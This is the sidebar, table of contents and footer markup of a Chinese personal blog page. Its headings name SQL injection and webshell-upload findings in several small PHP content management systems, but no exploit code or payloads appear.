            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">22</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">11</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">12</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://norw1nd.github.io/" title="Norw1nd" target="_blank">Norw1nd</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://Xvgeng.github.io/" title="Xvgeng" target="_blank">Xvgeng</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-Tun2-免费版本"><span class="nav-number">1.</span> <span class="nav-text">1. Tun2 免费版本</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-注入"><span class="nav-number">1.1.</span> <span class="nav-text">1.注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-直接数据库查询"><span class="nav-number">1.2.</span> <span class="nav-text">2.直接数据库查询</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-任意文件读写GETSHELL"><span class="nav-number">1.3.</span> <span class="nav-text">3.任意文件读写GETSHELL</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-乘风多用户PHP统计系统-v5-2"><span class="nav-number">2.</span> <span class="nav-text">2.乘风多用户PHP统计系统 v5.2</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-后台SQL注入"><span class="nav-number">2.1.</span> <span class="nav-text">1.后台SQL注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-CWCMS-网站管理系统PHP版"><span class="nav-number">3.</span> <span class="nav-text">3.CWCMS 网站管理系统PHP版</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-全站SQL注入"><span class="nav-number">3.1.</span> <span class="nav-text">1.全站SQL注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-后台修改设置GETSHELL"><span class="nav-number">3.2.</span> <span class="nav-text">2.后台修改设置GETSHELL</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-夏日PHP电子商务系统V-02"><span class="nav-number">4.</span> <span class="nav-text">4.夏日PHP电子商务系统V.02</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-全站SQL注入-1"><span class="nav-number">4.1.</span> <span class="nav-text">1.全站SQL注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#总结"><span class="nav-number">5.</span> <span class="nav-text">总结</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Noel</span>

  

  
</div>




  <div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>
  <!--<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动 v3.7.1</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a class="theme-link" target="_blank" href="https://theme-next.org">NexT.Pisces</a> v6.4.2</div>-->




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.4.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.4.2"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.4.2"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.4.2"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.4.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.4.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.4.2"></script>



  



  










  





  

  

  

  

  
  

  

  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
